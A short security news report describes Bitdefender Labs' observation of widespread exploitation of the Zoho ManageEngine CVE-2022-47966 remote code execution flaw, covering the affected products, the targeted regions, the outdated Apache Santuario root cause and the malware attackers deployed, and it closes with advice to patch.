Bitdefender Labs has reported that multiple threat actors are actively exploiting the Zoho ManageEngine CVE-2022-47966 vulnerability, which is an unauthenticated remote code execution flaw that impacts several Zoho products with SAML SSO enabled. Attackers use built-in tools like certutil.exe, bitsadmin.exe, powershell.exe, or curl.exe to drop malware on target systems.
Threat actors are targeting victims all over the world in various industries with most of the attacks targeted at entities in Australia, Canada, Italy, Mexico, the Netherlands, Nigeria, Ukraine, the U.K., and the U.S.
Bitdefender Labs noticed a global increase in attacks using the ManageEngine exploit CVE-2022-47966, which affects tens of products, including Access Manager Plus, ADManager Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM).
The root cause of the problem is that ManageEngine products use an outdated third-party dependency, Apache Santuario. Mid-January, Horizon3 researchers released a proof-of-concept (PoC) exploit for the CVE-2022-47966 along with technical analysis, and shortly after the PoC release, Bitdefender Labs reported exploitation attempts.
According to the analysis by the experts, there are 2,000 to 4,000 servers accessible from the internet, and the attacks aimed to deploy Netcat, Cobalt Strike beacon, RAT-el (open-source penetration testing tool), and others on the target systems.
Bitdefender identified four main clusters of attack types and information. Users are advised to apply patches as soon as possible and consider implementing additional security measures to protect against possible exploitation.
